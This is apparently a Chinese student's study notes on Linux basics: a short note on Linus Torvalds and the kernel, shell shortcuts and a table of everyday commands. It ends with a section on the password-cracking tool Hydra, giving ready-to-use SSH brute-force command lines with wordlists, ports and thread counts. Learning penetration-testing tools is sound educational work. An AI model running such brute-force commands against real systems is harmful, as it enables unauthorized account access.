第五篇学习成果的自我总结:
说明:上一篇文章涉及一些攻击过程,被删除了。之后就分享一些防御知识与一些课上学到的简单知识,学习的是Linux的ubantu
林纳斯·本纳第克特·托瓦兹——linux之父概况著名的电脑程序员、黑客。Linux内核的发明人及该计划的合作者。托瓦兹利用个人时间及器材创造出了这套当今全球最流行的操作系统(作业系统)内核之一。
内核:操作系统最核心、最底层的部分,是硬件与上层软件之间的桥梁;内核将硬件活了起来
Linux的根目录是/,不是windows的C、D、E盘
Linux的ubantu目录如下图所示:
命令入门:
打开终端:Ubuntu 可通过快捷键 Ctrl+Alt+T ,Kali 默认桌⾯有终端图标
命令格式: 命令 [选项] [参数] (例: ls -l /home )
核⼼快捷键:
● Tab :⾃动补全命令 / 路径(⼊⻔必备,减少输⼊错误)
● Ctrl+C :终⽌当前命令(卡顿时常⽤)
● Ctrl+L :清空终端屏幕
● ↑↓ :查看历史命令
| 命令 | 功能 | 实例 |
|---|---|---|
| pwd | 查看当前所在⽬录路径 | pwd (输出:/home/ubuntu) |
|---|---|---|
| ls | 列出⽬录内容 | ls -l (详细列表);ls -a (显示隐藏⽂件) |
|---|---|---|
| cd | 切换⽬录 | cd /home (绝对路径); cd ../ (返回上⼀级) |
|---|---|---|
| mkdir | 创建⽬录 | mkdir test (创建 test ⽬录);mkdir -p a/b/c (递归创建多级⽬录) |
|---|---|---|
| touch | 创建⽂件 | touch test.txt (创建空⽂件) |
|---|---|---|
| cp | 复制⽂件 / ⽬录 | cp test.txt /home (复制⽂件);cp -r a/ /home (复制⽬录,需加 - r) |
|---|---|---|
| mv | 移动 / 重命名 | mv test.txt /home (移动);mv test.txt new.txt (重命名) |
|---|---|---|
| rm | 删除⽂件 / ⽬录 | rm test.txt (删除⽂件);rm -rf a/ (强制删除⽬录,谨慎使⽤!) |
|---|---|---|
| cat | 查看⽂件内容 | cat /etc/passwd (查看⽤户配置⽂件) |
|---|---|---|
| more/less | 分⻚查看⼤⽂件 | more /var/log/syslog (按空格翻⻚) |
|---|---|---|
Hydra介绍
Hydra是⼀个开源的密码破解⼯具,主要⽤于⽹络安全的渗透测试。它可以对登录⻚⾯进⾏暴⼒破解攻击,⽀持多种协议,包括HTTP、HTTPS、FTP、SSH、Telnet等。Hydra的特点是能够使⽤多个密码同时进⾏尝试,以加快破解过程。 kali⾃带此⼯具,⽆需安装
hydra 参数 IP地址 服务名
hydra -l ⽤户名 -P 密码字典⽂件 ssh://⽬标IP地址
hydra -L users.txt -P passwords.txt ssh://192.168.1.100
指定端⼝
hydra -l ⽤户名 -P 密码字典⽂件 -s 端⼝号 ssh://⽬标IP地址
指定端⼝和线程数
hydra -l admin -P passlist.txt -s 2222 -t 32 ssh://10.0.0.1
保存结果到⽂件
hydra -l root -P rockyou.txt ssh://192.168.1.1 -o result.txt
